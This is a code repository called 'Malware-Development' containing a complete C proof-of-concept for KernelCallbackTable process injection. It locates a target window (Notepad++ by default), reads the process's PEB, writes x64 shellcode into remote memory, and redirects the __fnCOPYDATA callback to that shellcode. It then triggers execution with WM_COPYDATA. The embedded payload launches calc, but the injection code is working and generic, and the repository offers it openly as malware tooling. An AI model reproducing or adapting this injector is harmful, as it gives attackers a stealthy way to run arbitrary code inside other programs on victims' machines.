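├── .gitattributes
├── .gitignore
├── Process Injection
│   └── peb_KCT_injector.c
└── README.md

/.gitattributes:
--------------------------------------------------------------------------------
# Auto detect text files and perform LF normalization
* text=auto
--------------------------------------------------------------------------------

/.gitignore:
--------------------------------------------------------------------------------
# Prerequisites
*.d

# Object files
*.o
*.ko
*.obj
*.elf

# Linker output
*.ilk
*.map
*.exp

# Precompiled Headers
*.gch
*.pch

# Libraries
*.lib
*.a
*.la
*.lo

# Shared objects (inc. Windows DLLs)
*.dll
*.so
*.so.*
*.dylib

# Executables
*.exe
*.out
*.app
*.i*86
*.x86_64
*.hex

# Debug files
*.dSYM/
*.su
*.idb
*.pdb

# Kernel Module Compile Results
*.mod*
*.cmd
.tmp_versions/
modules.order
Module.symvers
Mkfile.old
dkms.conf
--------------------------------------------------------------------------------

/Process Injection/peb_KCT_injector.c:
--------------------------------------------------------------------------------
/*
 * peb_KCT_injector.c -- PoC: KernelCallbackTable hijack.
 *
 * Locates a window by class name, opens its owning process, reads the
 * process's PEB to find the user32 KernelCallbackTable, writes a copy of that
 * table in which entry 0 (__fnCOPYDATA) points at injected shellcode, points
 * the PEB at the copy, and triggers the callback with WM_COPYDATA.
 *
 * 64-bit only: the PEB field offset, the pointer widths and the bundled
 * payload all assume the x64 layout.
 *
 * NOTE(review): the original listing's four #include lines lost their header
 * names during extraction; the four below are what the code requires.
 */
#include <windows.h>
#include <winternl.h>
#include <stdio.h>
#include <string.h>

#ifndef _WIN64
#error "peb_KCT_injector.c assumes the 64-bit PEB layout (KernelCallbackTable at PEB+0x58)"
#endif

/*
 * Layout of the user32 KernelCallbackTable as this PoC expects it.
 * Only entry 0 (__fnCOPYDATA) is ever used or verified here; the remaining
 * entries are copied through unchanged. If the target's real table is larger
 * than this struct, the copy written below is truncated and the missing
 * entries read as zero in the new (zero-filled) allocation -- TODO confirm
 * against the target's user32 build before relying on other callbacks.
 */
typedef struct _KERNELCALLBACKTABLE_T {
    ULONG_PTR __fnCOPYDATA;
    ULONG_PTR __fnCOPYGLOBALDATA;
    ULONG_PTR __fnDWORD;
    ULONG_PTR __fnNCDESTROY;
    ULONG_PTR __fnDWORDOPTINLPMSG;
    ULONG_PTR __fnINOUTDRAG;
    ULONG_PTR __fnGETTEXTLENGTHS;
    ULONG_PTR __fnINCNTOUTSTRING;
    ULONG_PTR __fnPOUTLPINT;
    ULONG_PTR __fnINLPCOMPAREITEMSTRUCT;
    ULONG_PTR __fnINLPCREATESTRUCT;
    ULONG_PTR __fnINLPDELETEITEMSTRUCT;
    ULONG_PTR __fnINLPDRAWITEMSTRUCT;
    ULONG_PTR __fnPOPTINLPUINT;
    ULONG_PTR __fnPOPTINLPUINT2;
    ULONG_PTR __fnINLPMDICREATESTRUCT;
    ULONG_PTR __fnINOUTLPMEASUREITEMSTRUCT;
    ULONG_PTR __fnINLPWINDOWPOS;
    ULONG_PTR __fnINOUTLPPOINT5;
    ULONG_PTR __fnINOUTLPSCROLLINFO;
    ULONG_PTR __fnINOUTLPRECT;
    ULONG_PTR __fnINOUTNCCALCSIZE;
    ULONG_PTR __fnINOUTLPPOINT5_;
    ULONG_PTR __fnINPAINTCLIPBRD;
    ULONG_PTR __fnINSIZECLIPBRD;
    ULONG_PTR __fnINDESTROYCLIPBRD;
    ULONG_PTR __fnINSTRING;
    ULONG_PTR __fnINSTRINGNULL;
    ULONG_PTR __fnINDEVICECHANGE;
    ULONG_PTR __fnPOWERBROADCAST;
    ULONG_PTR __fnINLPUAHDRAWMENU;
    ULONG_PTR __fnOPTOUTLPDWORDOPTOUTLPDWORD;
    ULONG_PTR __fnOPTOUTLPDWORDOPTOUTLPDWORD_;
    ULONG_PTR __fnOUTDWORDINDWORD;
    ULONG_PTR __fnOUTLPRECT;
    ULONG_PTR __fnOUTSTRING;
    ULONG_PTR __fnPOPTINLPUINT3;
    ULONG_PTR __fnPOUTLPINT2;
    ULONG_PTR __fnSENTDDEMSG;
    ULONG_PTR __fnINOUTSTYLECHANGE;
    ULONG_PTR __fnHkINDWORD;
    ULONG_PTR __fnHkINLPCBTACTIVATESTRUCT;
    ULONG_PTR __fnHkINLPCBTCREATESTRUCT;
    ULONG_PTR __fnHkINLPDEBUGHOOKSTRUCT;
    ULONG_PTR __fnHkINLPMOUSEHOOKSTRUCTEX;
    ULONG_PTR __fnHkINLPKBDLLHOOKSTRUCT;
    ULONG_PTR __fnHkINLPMSLLHOOKSTRUCT;
    ULONG_PTR __fnHkINLPMSG;
    ULONG_PTR __fnHkINLPRECT;
    ULONG_PTR __fnHkOPTINLPEVENTMSG;
    ULONG_PTR __xxxClientCallDelegateThread;
    ULONG_PTR __ClientCallDummyCallback;
    ULONG_PTR __fnKEYBOARDCORRECTIONCALLOUT;
    ULONG_PTR __fnOUTLPCOMBOBOXINFO;
    ULONG_PTR __fnINLPCOMPAREITEMSTRUCT2;
    ULONG_PTR __xxxClientCallDevCallbackCapture;
    ULONG_PTR __xxxClientCallDitThread;
    ULONG_PTR __xxxClientEnableMMCSS;
    ULONG_PTR __xxxClientUpdateDpi;
    ULONG_PTR __xxxClientExpandStringW;
    ULONG_PTR __ClientCopyDDEIn1;
    ULONG_PTR __ClientCopyDDEIn2;
    ULONG_PTR __ClientCopyDDEOut1;
    ULONG_PTR __ClientCopyDDEOut2;
    ULONG_PTR __ClientCopyImage;
    ULONG_PTR __ClientEventCallback;
    ULONG_PTR __ClientFindMnemChar;
    ULONG_PTR __ClientFreeDDEHandle;
    ULONG_PTR __ClientFreeLibrary;
    ULONG_PTR __ClientGetCharsetInfo;
    ULONG_PTR __ClientGetDDEFlags;
    ULONG_PTR __ClientGetDDEHookData;
    ULONG_PTR __ClientGetListboxString;
    ULONG_PTR __ClientGetMessageMPH;
    ULONG_PTR __ClientLoadImage;
    ULONG_PTR __ClientLoadLibrary;
    ULONG_PTR __ClientLoadMenu;
    ULONG_PTR __ClientLoadLocalT1Fonts;
    ULONG_PTR __ClientPSMTextOut;
    ULONG_PTR __ClientLpkDrawTextEx;
    ULONG_PTR __ClientExtTextOutW;
    ULONG_PTR __ClientGetTextExtentPointW;
    ULONG_PTR __ClientCharToWchar;
    ULONG_PTR __ClientAddFontResourceW;
    ULONG_PTR __ClientThreadSetup;
    ULONG_PTR __ClientDeliverUserApc;
    ULONG_PTR __ClientNoMemoryPopup;
    ULONG_PTR __ClientMonitorEnumProc;
    ULONG_PTR __ClientCallWinEventProc;
    ULONG_PTR __ClientWaitMessageExMPH;
    ULONG_PTR __ClientWOWGetProcModule;
    ULONG_PTR __ClientWOWTask16SchedNotify;
    ULONG_PTR __ClientImmLoadLayout;
    ULONG_PTR __ClientImmProcessKey;
    ULONG_PTR __fnIMECONTROL;
    ULONG_PTR __fnINWPARAMDBCSCHAR;
    ULONG_PTR __fnGETTEXTLENGTHS2;
    ULONG_PTR __fnINLPKDRAWSWITCHWND;
    ULONG_PTR __ClientLoadStringW;
    ULONG_PTR __ClientLoadOLE;
    ULONG_PTR __ClientRegisterDragDrop;
    ULONG_PTR __ClientRevokeDragDrop;
    ULONG_PTR __fnINOUTMENUGETOBJECT;
    ULONG_PTR __ClientPrinterThunk;
    ULONG_PTR __fnOUTLPCOMBOBOXINFO2;
    ULONG_PTR __fnOUTLPSCROLLBARINFO;
    ULONG_PTR __fnINLPUAHDRAWMENU2;
    ULONG_PTR __fnINLPUAHDRAWMENUITEM;
    ULONG_PTR __fnINLPUAHDRAWMENU3;
    ULONG_PTR __fnINOUTLPUAHMEASUREMENUITEM;
    ULONG_PTR __fnINLPUAHDRAWMENU4;
    ULONG_PTR __fnOUTLPTITLEBARINFOEX;
    ULONG_PTR __fnTOUCH;
    ULONG_PTR __fnGESTURE;
    ULONG_PTR __fnPOPTINLPUINT4;
    ULONG_PTR __fnPOPTINLPUINT5;
    ULONG_PTR __xxxClientCallDefaultInputHandler;
    ULONG_PTR __fnEMPTY;
    ULONG_PTR __ClientRimDevCallback;
    ULONG_PTR __xxxClientCallMinTouchHitTestingCallback;
    ULONG_PTR __ClientCallLocalMouseHooks;
    ULONG_PTR __xxxClientBroadcastThemeChange;
    ULONG_PTR __xxxClientCallDevCallbackSimple;
    ULONG_PTR __xxxClientAllocWindowClassExtraBytes;
    ULONG_PTR __xxxClientFreeWindowClassExtraBytes;
    ULONG_PTR __fnGETWINDOWDATA;
    ULONG_PTR __fnINOUTSTYLECHANGE2;
    ULONG_PTR __fnHkINLPMOUSEHOOKSTRUCTEX2;
} KERNELCALLBACKTABLE;

/*
 * Offset of PEB.KernelCallbackTable in the 64-bit PEB. winternl.h only
 * exposes this slot as a Reserved* member, so it is addressed by offset.
 */
#define PEB_KERNELCALLBACKTABLE_OFFSET 0x58

/* Window class used to locate the target when no argv[1] is given. */
#define DEFAULT_TARGET_CLASS "Notepad++"

typedef NTSTATUS (NTAPI *NtQueryInformationProcess_t)(HANDLE, PROCESSINFOCLASS,
                                                      PVOID, ULONG, PULONG);

/*
 * Read exactly `size` bytes from `remote` in `hProc` into `local`.
 * Returns 1 on success, 0 (with a message on stderr) on any failure or
 * short read.
 */
static int read_remote(HANDLE hProc, LPCVOID remote, void *local, SIZE_T size)
{
    SIZE_T done = 0;

    /* The out-parameter is SIZE_T: a DWORD here would be overrun on x64. */
    if (!ReadProcessMemory(hProc, remote, local, size, &done) || done != size) {
        fprintf(stderr, "[-] ReadProcessMemory(%p, %lu bytes) failed: %lu (read %lu)\n",
                remote, (unsigned long)size, GetLastError(), (unsigned long)done);
        return 0;
    }
    return 1;
}

/*
 * Write exactly `size` bytes from `local` to `remote` in `hProc`.
 * Returns 1 on success, 0 (with a message on stderr) on any failure or
 * short write.
 */
static int write_remote(HANDLE hProc, LPVOID remote, const void *local, SIZE_T size)
{
    SIZE_T done = 0;

    if (!WriteProcessMemory(hProc, remote, local, size, &done) || done != size) {
        fprintf(stderr, "[-] WriteProcessMemory(%p, %lu bytes) failed: %lu (wrote %lu)\n",
                remote, (unsigned long)size, GetLastError(), (unsigned long)done);
        return 0;
    }
    return 1;
}

/*
 * Entry point.
 *   argv[1] (optional): window class of the target; defaults to "Notepad++".
 * Returns 0 once WM_COPYDATA has been sent to the hijacked target, 1 on any
 * failure. On failure the remote allocations made so far are released; on
 * success they are intentionally left mapped (the payload may still be
 * running inside the target).
 */
int main(int argc, char **argv)
{
    /* x64 shellcode carried over verbatim; its trailing ASCII bytes are "calc". */
    unsigned char payload[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c\x63\x00";
    SIZE_T payloadSize = sizeof(payload);
    const char *targetClass =
        (argc > 1 && argv[1][0] != '\0') ? argv[1] : DEFAULT_TARGET_CLASS;

    int rc = 1;
    HANDLE hProc = NULL;
    LPVOID payloadAddr = NULL;
    LPVOID newKCTAddr = NULL;
    DWORD PID = 0;
    DWORD oldProtect = 0;
    HMODULE hNtdll = NULL;
    NtQueryInformationProcess_t pNtQueryInformationProcess = NULL;
    NTSTATUS status;
    PROCESS_BASIC_INFORMATION pbi;
    PEB peb;
    ULONG_PTR originalKCT = 0;
    KERNELCALLBACKTABLE kct;
    COPYDATASTRUCT cds;
    WCHAR msg[] = L"Pwn";

    HWND hWindow = FindWindowA(targetClass, NULL);
    if (hWindow == NULL) {
        fprintf(stderr, "[-] No window of class \"%s\" found (error %lu)\n",
                targetClass, GetLastError());
        return 1;
    }
    printf("[+] Window Handle: 0x%p\n", (void *)hWindow);

    if (GetWindowThreadProcessId(hWindow, &PID) == 0 || PID == 0) {
        fprintf(stderr, "[-] GetWindowThreadProcessId failed: %lu\n", GetLastError());
        return 1;
    }
    printf("[+] Process ID: %lu\n", PID);

    /* Least privilege: query + read/write/alloc is all the steps below need. */
    hProc = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ |
                        PROCESS_VM_WRITE | PROCESS_VM_OPERATION,
                        FALSE, PID);
    if (hProc == NULL) {
        fprintf(stderr, "[-] OpenProcess(%lu) failed: %lu\n", PID, GetLastError());
        return 1;
    }
    printf("Process PID %lu HANDLE 0x%p\n", PID, (void *)hProc);

    /* ntdll is always mapped; no LoadLibrary needed. */
    hNtdll = GetModuleHandleA("ntdll.dll");
    if (hNtdll != NULL) {
        pNtQueryInformationProcess = (NtQueryInformationProcess_t)
            GetProcAddress(hNtdll, "NtQueryInformationProcess");
    }
    if (pNtQueryInformationProcess == NULL) {
        fprintf(stderr, "[-] Could not resolve NtQueryInformationProcess: %lu\n",
                GetLastError());
        goto cleanup;
    }
    printf("NtQueryInformationProcess at 0x%p\n", (void *)pNtQueryInformationProcess);

    status = pNtQueryInformationProcess(hProc, ProcessBasicInformation, &pbi,
                                        sizeof(pbi), NULL);
    if (!NT_SUCCESS(status) || pbi.PebBaseAddress == NULL) {
        fprintf(stderr, "[-] NtQueryInformationProcess failed: 0x%08lx\n",
                (unsigned long)status);
        goto cleanup;
    }
    printf("PROCESS_BASIC_INFORMATION PebBaseAddress at 0x%p\n",
           (void *)pbi.PebBaseAddress);

    if (sizeof(peb) < PEB_KERNELCALLBACKTABLE_OFFSET + sizeof(ULONG_PTR)) {
        fprintf(stderr, "[-] winternl.h PEB is too small for offset 0x%x\n",
                PEB_KERNELCALLBACKTABLE_OFFSET);
        goto cleanup;
    }
    if (!read_remote(hProc, pbi.PebBaseAddress, &peb, sizeof(peb))) {
        goto cleanup;
    }

    /* memcpy rather than a pointer cast: avoids the aliasing violation. */
    memcpy(&originalKCT, (unsigned char *)&peb + PEB_KERNELCALLBACKTABLE_OFFSET,
           sizeof(originalKCT));
    if (originalKCT == 0) {
        fprintf(stderr, "[-] Target PEB has a NULL KernelCallbackTable pointer\n");
        goto cleanup;
    }
    printf("KERNELCALLBACKTABLE at 0x%p\n", (void *)originalKCT);

    if (!read_remote(hProc, (LPCVOID)originalKCT, &kct, sizeof(kct))) {
        goto cleanup;
    }
    printf("KERNELCALLBACKTABLE.__fnCOPYDATA at 0x%p\n", (void *)kct.__fnCOPYDATA);

    /* Stage the payload RW, then flip to RX: never leave an RWX region behind. */
    payloadAddr = VirtualAllocEx(hProc, NULL, payloadSize,
                                 MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    if (payloadAddr == NULL) {
        fprintf(stderr, "[-] VirtualAllocEx(payload) failed: %lu\n", GetLastError());
        goto cleanup;
    }
    if (!write_remote(hProc, payloadAddr, payload, payloadSize)) {
        goto cleanup;
    }
    if (!VirtualProtectEx(hProc, payloadAddr, payloadSize, PAGE_EXECUTE_READ,
                          &oldProtect)) {
        fprintf(stderr, "[-] VirtualProtectEx(payload) failed: %lu\n", GetLastError());
        goto cleanup;
    }
    printf("[+] Payload Address: 0x%p\n", payloadAddr);

    /*
     * Write a private copy of the table with entry 0 redirected. The original
     * table is left untouched so the PEB pointer can be restored afterwards.
     */
    newKCTAddr = VirtualAllocEx(hProc, NULL, sizeof(kct),
                                MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    if (newKCTAddr == NULL) {
        fprintf(stderr, "[-] VirtualAllocEx(table) failed: %lu\n", GetLastError());
        goto cleanup;
    }
    kct.__fnCOPYDATA = (ULONG_PTR)payloadAddr;
    if (!write_remote(hProc, newKCTAddr, &kct, sizeof(kct))) {
        goto cleanup;
    }
    printf("[+] __fnCOPYDATA: 0x%p\n", (void *)kct.__fnCOPYDATA);

    if (!write_remote(hProc, (PBYTE)pbi.PebBaseAddress + PEB_KERNELCALLBACKTABLE_OFFSET,
                      &newKCTAddr, sizeof(ULONG_PTR))) {
        goto cleanup;
    }
    printf("[+] Remote process PEB updated\n");

    /*
     * Trigger: WM_COPYDATA is dispatched through __fnCOPYDATA in the target.
     * SendMessage blocks until the target's window procedure returns (or the
     * receiving thread goes away), so the payload runs before it returns.
     */
    cds.dwData = 1;
    cds.cbData = (DWORD)(lstrlenW(msg) * sizeof(WCHAR));  /* msg is WCHAR: use the W variant */
    cds.lpData = msg;
    SendMessage(hWindow, WM_COPYDATA, (WPARAM)hWindow, (LPARAM)&cds);
    printf("[+] Payload executed\n");
    rc = 0;

    /* Best effort: point the PEB back at the original table. */
    if (!write_remote(hProc, (PBYTE)pbi.PebBaseAddress + PEB_KERNELCALLBACKTABLE_OFFSET,
                      &originalKCT, sizeof(originalKCT))) {
        fprintf(stderr, "[!] Could not restore the original KernelCallbackTable pointer\n");
    }

cleanup:
    if (rc != 0 && hProc != NULL) {
        /* Failure before the trigger: nothing in the target references these yet. */
        if (newKCTAddr != NULL) {
            VirtualFreeEx(hProc, newKCTAddr, 0, MEM_RELEASE);
        }
        if (payloadAddr != NULL) {
            VirtualFreeEx(hProc, payloadAddr, 0, MEM_RELEASE);
        }
    }
    if (hProc != NULL) {
        CloseHandle(hProc);
    }
    return rc;
}
--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
# Malware-Development

--------------------------------------------------------------------------------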